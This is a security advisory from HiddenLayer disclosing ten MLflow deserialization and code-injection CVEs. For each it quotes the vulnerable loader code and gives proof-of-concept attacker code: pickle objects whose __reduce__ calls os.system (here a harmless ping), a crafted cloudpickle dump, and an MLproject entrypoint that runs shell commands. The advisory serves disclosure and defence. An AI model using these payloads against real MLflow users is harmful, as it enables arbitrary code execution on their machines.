HiddenLayer, a Gartner recognized Cool Vendor for AI Security, is the leading provider of Security for AI. Its security platform helps enterprises safeguard the machine learning models behind their most important products. HiddenLayer is the only company to offer turnkey security for AI that does not add unnecessary complexity to models and does not require access to raw data and algorithms. Founded by a team with deep roots in security and ML, HiddenLayer aims to protect enterprise’s AI from inference, bypass, extraction attacks, and model theft. The company is backed by a group of strategic investors, including M12, Microsoft’s Venture Fund, Moore Strategic Ventures, Booz Allen Ventures, IBM Ventures, and Capital One Ventures.
June 4, 2024
Cloudpickle and Pickle Load on Sklearn Model Load Leading to Code Execution
CVE Number
CVE-2024-37052
CVE-2024-37053
Summary
A deserialization vulnerability exists in the sklearn/__init__.py file, within the function _load_model_from_local_file. An attacker can inject a malicious pickle object into a model file on upload which will then be deserialized when the model is loaded, executing the malicious code on the victim machine.
Products Impacted
This vulnerability was introduced in version 1.1.0 of MLflow.
CVSS Score: 8.8
AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE Categorization
CWE-502: Deserialization of Untrusted Data.
Details
The vulnerability exists within the sklearn/__init__.py file, within the function _load_model_from_local_file. This is called when the mlflow.sklearn.load_model function is called.
def _load_model_from_local_file(path, serialization_format):
...
with open(path, "rb") as f:...
if serialization_format == SERIALIZATION_FORMAT_PICKLE:
return pickle.load(f)
elif serialization_format == SERIALIZATION_FORMAT_CLOUDPICKLE:
import cloudpickle
return cloudpickle.load(f)
An attacker can exploit this by injecting a pickle object that will execute arbitrary code when deserialized into a model. The attacker can then call the sklearn.log_model() function to serialize this model and log it to the tracking server. By default, cloudpickle.load is used on deserialization when the model is loaded. The serialization format can be set to ‘pickle’ when the model is logged in order to force the use of pickle.load() when the model is loaded. In the below example, the pickle object has been injected into the init method of the ElasticNet class.
with mlflow.start_run():
lr = ElasticNet(alpha=alpha, l1_ratio=l1_ratio, random_state=42)
lr.fit(train_x, train_y)
...
# Either upload model which will use default format of cloudpickle
mlflow.sklearn.log_model(lr, artifact_path="model", registered_model_name="SklearnPickleDefault")
# Or upload model and set serialiazation format to pickle
mlflow.sklearn.log_model(lr, artifact_path="model", registered_model_name="SklearnPickleDefault", serialization_format='pickle'
)
When the model is loaded by the victim (example code snippet below), the arbitrary code is executed on their machine:
import mlflow
...
logged_model = "models:/SklearnPickleDefault/1"
loaded_model = mlflow.sklearn.load_model(logged_model, dst_path='/tmp/sklearn_model')
Cloudpickle Load on PyFunc Model Load Leading to Code Execution
CVE Number
CVE-2024-37054
Summary
A deserialization vulnerability exists within the mlflow/pyfunc/model.py file, within the function _load_pyfunc. An attacker can inject a malicious pickle object into a model file on upload which will then be deserialized when the model is loaded, executing the malicious code on the victim machine.
Products Impacted
This vulnerability was introduced in version 0.9.0 of MLflow.
CVSS Score: 8.8
AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE Categorization
CWE-502: Deserialization of Untrusted Data.
Details
The vulnerability exists within the mlflow/pyfunc/model.py file, within the function _load_context_model_and_signature. This is called when the mlflow.pyfunc.load_model function is called.
def _load_context_model_and_signature(
model_path: str, model_config: Optional[Dict[str, Any]] = None
):
...
with open(os.path.join(model_path, python_model_subpath), "rb") as f:
python_model = cloudpickle.load(f)
An attacker can exploit this by creating a wrapper for a pmdarima model that contains malicious code and use the mlflow.pyfunc.log_model() to log this to the target MLflow server.
class PmdarimaWrapper(mlflow.pyfunc.PythonModel):
def __init__(self):
import os
class RunCommand:
def __reduce__(self):
return (os.system, ('ping -c 4 8.8.8.8',))
self.command = RunCommand()
...
# Log the model
with mlflow.start_run():
wrapper = PmdarimaWrapper()
mlflow.pyfunc.log_model(
artifact_path="model",
python_model=wrapper,
registered_model_name="PyfuncPickleTest"
)
When the model is loaded by the victim (example code snippet below), the arbitrary code is executed on their machine:
import mlflow
...
logged_model = "models:/PyfuncPickleTest/1"
loaded_model = mlflow.pyfunc.load_model(logged_model, dst_path='/tmp/pyfunc_model')
Pickle Load on Pmdarima Model Load Leading to Code Execution
CVE Number
CVE-2024-37055
Summary
A deserialization vulnerability exists within the pmdarima/__init__.py file, within the function _load_model. An attacker can inject a malicious pickle object into a model file on upload which will then be deserialized when the model is loaded, executing the malicious code on the victim machine.
Products Impacted
This vulnerability was introduced in version 1.24.0 of MLflow.
CVSS Score: 8.8
AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE Categorization
CWE-502: Deserialization of Untrusted Data.
Details
The vulnerability exists within the pmdarima/__init__.py file, within the function _load_model. This is called when the mlflow.pmdarima.load_model function is called.
def _load_model(path):
with open(path, "rb") as pickled_model:
return pickle.load(pickled_model)
An attacker can exploit this by injecting a pickle object that will execute arbitrary code when deserialized into a model. The attacker can then call the pmdarima.log_model() function to serialize this model and log it to the tracking server. In the below example, the malicious pickle object has been injected into the init method within the _PmdarimaModelWrapper class in the file pmdarima/__init__.py, which is called through the auto_arima function. Before logging the model, editing the save_model function to force MLflow to pickle the attacker’s model is also required.
with mlflow.start_run():
# Create the model
model = pmdarima.auto_arima(train["sales"], seasonal=True, m=12)
...
# Log model
mlflow.pmdarima.log_model(model, ARTIFACT_PATH, registered_model_name="PmdarimaTestModel")
When the model is loaded by the victim (example code snippet below), the arbitrary code is executed on their machine:
import mlflow
...
logged_model = "models:/PmdarimaTestModel/1"
loaded_model = mlflow.pmdarima.load_model(logged_model, dst_path='/tmp/pmdarima_model')
Cloudpickle Load on LightGBM SciKit Learn Model Leading to Code Execution
CVE Number
CVE-2024-37056
Summary
A deserialization vulnerability exists within the mlflow/lightgbm/__init__.py file, within the function _load_model. An attacker can inject a malicious pickle object into a model file on upload which will then be deserialized when the model is loaded, executing the malicious code on the victim machine.
Products Impacted
This vulnerability was introduced in version 1.23.0 of MLflow.
CVSS Score: 8.8
AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE Categorization
CWE-502: Deserialization of Untrusted Data.
Details
The vulnerability exists within the mlflow/lightgbm/__init__.py file, within the function _load_model. This is called when the mlflow.lightgbm.load_model function is called.
def _load_model(path):
...
if model_class == "lightgbm.basic.Booster":
import lightgbm as lgb
model = lgb.Booster(model_file=lgb_model_path)
else:
# LightGBM scikit-learn models are deserialized using Cloudpickle.
import cloudpickle
with open(lgb_model_path, "rb") as f:
model = cloudpickle.load(f)
An attacker can exploit this by injecting a pickle object that will execute arbitrary code when deserialized into a LightGBM sci-kit learn model. The attacker can then call the lightgbm.log_model() function to serialize this model and log it to the tracking server. In the below example, the malicious pickle object has been injected into the init method of the LGBMModel class within the lightgbm/sklearn.py file.
# Create and train a LightGBM model
model = lgb.LGBMClassifier()
model.fit(X_train, y_train)
...
# Start an MLflow run
with mlflow.start_run():
...
# Log the LightGBM model
mlflow.lightgbm.log_model(model, "model", registered_model_name="LightGBMSklearnPickle")
When the model is loaded by the victim (example code snippet below), the arbitrary code is executed on their machine:
import mlflow
...
logged_model = "models:/LightGBMSklearnPickle/1"
loaded_model = mlflow.lightgbm.load_model(logged_model, dst_path='/tmp/lightgbm_model')
Cloudpickle Load on TensorFlow Keras Model Leading to Code Execution
CVE Number
CVE-2024-37057
Summary
A deserialization vulnerability exists within the mlflow/tensorflow/__init__.py file, within the function _load_custom_objects. An attacker can inject a malicious pickle object into a model file on upload which will then be deserialized when the model is loaded, executing the malicious code on the victim machine.
Products Impacted
This vulnerability was introduced in version 2.0.0rc0 of MLflow.
CVSS Score: 8.8
AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE Categorization
CWE-502: Deserialization of Untrusted Data.
Details
This vulnerability exists within the mlflow/tensorflow/__init__.py file, within the function _load_custom_objects. This is called when the mlflow.tensorflow.load_model function is called.
def _load_custom_objects(path, file_name):
custom_objects_path = None
if os.path.isdir(path):
if os.path.isfile(os.path.join(path, file_name)):
custom_objects_path = os.path.join(path, file_name)
if custom_objects_path is not None:
import cloudpickle
with open(custom_objects_path, "rb") as f:
return cloudpickle.load(f)
An attacker can exploit this by creating a custom function containing a pickle object that will execute arbitrary code when deserialized and adding it under the custom_objects parameter when calling the model.tensorflow.log_model() function to log the model to the server.
# Add the custom object to be pickled
def create_pickle():
import os
class RunCommand:
def __reduce__(self):
return (os.system, ('ping -c 4 8.8.8.8',))
return RunCommand()
...
# Build and Compile the Model
model = Sequential([
Dense(10, activation='relu', input_shape=(4,)),
Dense(10, activation='relu'),
Dense(3, activation='softmax')
])
...
# Log the Model
with mlflow.start_run():
mlflow.tensorflow.log_model(model, "model", custom_objects={'PickleFunction': create_pickle()}, registered_model_name="TensorFlowKerasPickle")
When the model is loaded by the victim (example code snippet below), the arbitrary code is executed on their machine:
import mlflow
...
logged_model = "models:/TensorFlowKerasPickle/1"
loaded_model = mlflow.tensorflow.load_model(logged_model, dst_path='/tmp/tensorflow_model')
Cloudpickle Load on Langchain AgentExecutor Model Load Leading to Code Execution
CVE Number
CVE-2024-37058
Summary
A deserialization vulnerability exists within the mlflow/langchain/utils.py file, within the function _load_from_pickle. An attacker can inject a malicious pickle object into a model file on upload which will then be deserialized when the model is loaded, executing the malicious code on the victim machine.
Products Impacted
This vulnerability was introduced in version 2.5.0 of MLflow.
CVSS Score: 8.8
AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE Categorization
CWE-502: Deserialization of Untrusted Data.
Details
The vulnerability exists within the mlflow/langchain/utils.py file, within the function _load_from_pickle. This is called when the mlflow.langchain.load_model function is called.
def _load_from_pickle(path):
with open(path, "rb") as f:
return cloudpickle.load(f)
An attacker can exploit this by building an AgentExecutor with Tools specially crafted to trigger the below elif statement within the _save_base_lcs function of the same utils.py file. The attacker could alter the code within this method, crafting a pickle object that will execute arbitrary code when deserialized and pass it to cloudpickle.dump().
elif isinstance(model, langchain.agents.agent.AgentExecutor):
...
if model.tools:
tools_data_path = os.path.join(path, _TOOLS_DATA_FILE_NAME)
try:
class RunCommand:
def __reduce__(self):
return (os.system, ('ping -c 4 8.8.8.8',))
command = RunCommand()
with open(tools_data_path, "wb") as f:
cloudpickle.dump(command, f)
This model can then be logged to the server at the specified tracking URI by calling the model.langchain.log_model() function.
When the model is loaded by the victim (example code snippet below), the arbitrary code is executed on their machine:
import mlflow
...
logged_model = "models:/LangchainPickle/1"
loaded_model = mlflow.langchain.load_model(logged_model, dst_path='/tmp/langchain_model')
Cloudpickle Load on PyTorch Model Load Leading to Code Execution
CVE Number
CVE-2024-37059
Summary
A deserialization vulnerability exists within the mlflow/pytorch/__init__.py file, within the function _load_model. An attacker can inject a malicious pickle object into a model file on upload which will then be deserialized when the model is loaded, executing the malicious code on the victim machine.
Products Impacted
This vulnerability was introduced in version 0.5.0 of MLflow.
CVSS Score: 8.8
AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE Categorization
CWE-94: Improper Control of Generation of Code (‘Code Injection’).
Details
This vulnerability exists within the mlflow/pytorch/__init__.py file, within the function _load_model. This is called when the mlflow.pytorch.load_model function is called.
def _load_model(path, device=None, **kwargs):
import torch
...
if Version(torch.__version__) >= Version("1.5.0"):
pytorch_model = torch.load(model_path, **kwargs)
else:
try:
pytorch_model = torch.load(model_path, **kwargs)
An attacker can exploit this by injecting a pickle object that will execute arbitrary code when deserialized into a PyTorch model upon build. When logging the specially crafted PyTorch model with MLflow, the model will be serialized via PyTorch’s torch.save function. This will be deserialized during model load, as the _load_model function calls PyTorch’s torch.load function, which will lead to the execution of the arbitrary code on the victim machine.
class SimpleNet(nn.Module):
def __init__(self, input_size, hidden_size, num_classes):
...
import os
class RunCommand:
def __reduce__(self):
return (os.system, ('ping -c 4 8.8.8.8',))
self.command = RunCommand()
...
model = SimpleNet(input_size, hidden_size, num_classes)
with mlflow.start_run():
mlflow.pytorch.log_model(model, "model", registered_model_name="PytorchTest")
When the model is loaded by the victim (example code snippet below), the arbitrary code is executed on their machine:
import mlflow
...
logged_model = "models:/PytorchTest/1"
loaded_model = mlflow.pytorch.load_model(logged_model, dst_path='/tmp/pytorch_model')
Pickle Load on Recipe Run Leading to Code Execution
CVE Number
CVE-2024-37060
Summary
A deserialization vulnerability exists within the recipes/cards/__init__.py file within the class BaseCard, in the static method load. An attacker can create an MLProject Recipe containing a malicious pickle file (e.g. pickle.pkl) and a python script that calls BaseCard.load(pickle.pkl). The pickle file will be deserialized when the project is run leading to execution of the arbitrary code on the victim machine.
Products Impacted
This vulnerability was introduced in version 1.27.0 of MLflow.
CVSS Score: 8.8
AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE Categorization
CWE-502: Deserialization of Untrusted Data.
Details
The vulnerability exists within the recipes/cards/__init__.py file within the class BaseCard, in the static method load.
@staticmethod
def load(path):
if os.path.isdir(path):
path = os.path.join(path, CARD_PICKLE_NAME)
with open(path, "rb") as f:
return pickle.load(f)
An attacker can exploit this by creating an MLProject Recipe containing a pickle file that will execute arbitrary code when deserialized, along with code that calls BaseCard.load(pickle.pkl), pointing to the file pickle.pkl as shown below. The attacker could share this project with a victim, and when they attempt to run it, the pickle file will be deserialized and the arbitrary code executed on their machine.
An example MLproject file:
name: RecipeTestingProject
conda_env: conda.yaml
entry_points:
main:
command: "python recipe_card_pickle.py"
The snippet from recipe_card_pickle.py file that is responsible for calling the vulnerable function when the victim runs mlflow run. from within the recipe directory:
r = Recipe(profile="local")
r.run("ingest")
BaseCard.load("recipe_card.pkl")
Remote Code Execution on Local System via MLproject YAML File
CVE Number
CVE-2024-37061
Summary
A code injection vulnerability exists within the ML Project run procedure in the _run_entry_point function, within the projects/backend/local.py file. An attacker can package an MLflow Project where the MLproject main entrypoint command contains arbitrary code (or an operating system appropriate command), which will be executed on the victim machine when the project is run.
Products Impacted
This vulnerability was introduced in version 1.11.0 of MLflow.
CVSS Score: 8.8
AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE Categorization
CWE-94: Improper Control of Generation of Code (‘Code Injection’).
Details
The vulnerability exists within the ML Project run procedure in the _run_entry_point function, within the projects/backend/local.py file.
def _run_entry_point(command, work_dir, experiment_id, run_id):
...
if os.name != "nt":
process = subprocess.Popen(["bash", "-c", command], close_fds=True, cwd=work_dir, env=env)
else:
process = subprocess.Popen(["cmd", "/c", command], close_fds=True, cwd=work_dir, env=env)
An attacker can exploit this by creating an MLflow Project where the MLproject main entrypoint command contains arbitrary code (or an operating system appropriate command). The attacker could share this project with a victim, and when the victim runs mlflow run. from within the recipe directory, the code will be executed on the victim machine.
An example MLproject file:
name: RecipeTestingProject
conda_env: conda.yaml
entry_points:
main:
command: "python -c 'import os; os.system(\"ping -c 4 8.8.8.8\")'"
Timeline
December 20, 2023 — vendor disclosure via process outlined in SECURITY.md
January 15, 2024 — follow up email sent to vendor
January 29, 2024 — follow up email sent to vendor
February 13, 2024 — followed up with vendor over LinkedIn
February 22, 2024 — followed up with vendor over LinkedIn
February 27, 2024 — vendor acknowledged receipt
March 04, 2024 — follow up email sent to vendor
March 18, 2024 — follow up email sent to vendor
March 19, 2024 — grace period for response and patching passed
March 21, 2024 — followed up with vendor over LinkedIn
May 30, 2024 — followed up with vendor letting them know we plan to publish on 04 June 2024
June 04, 2024 — public disclosure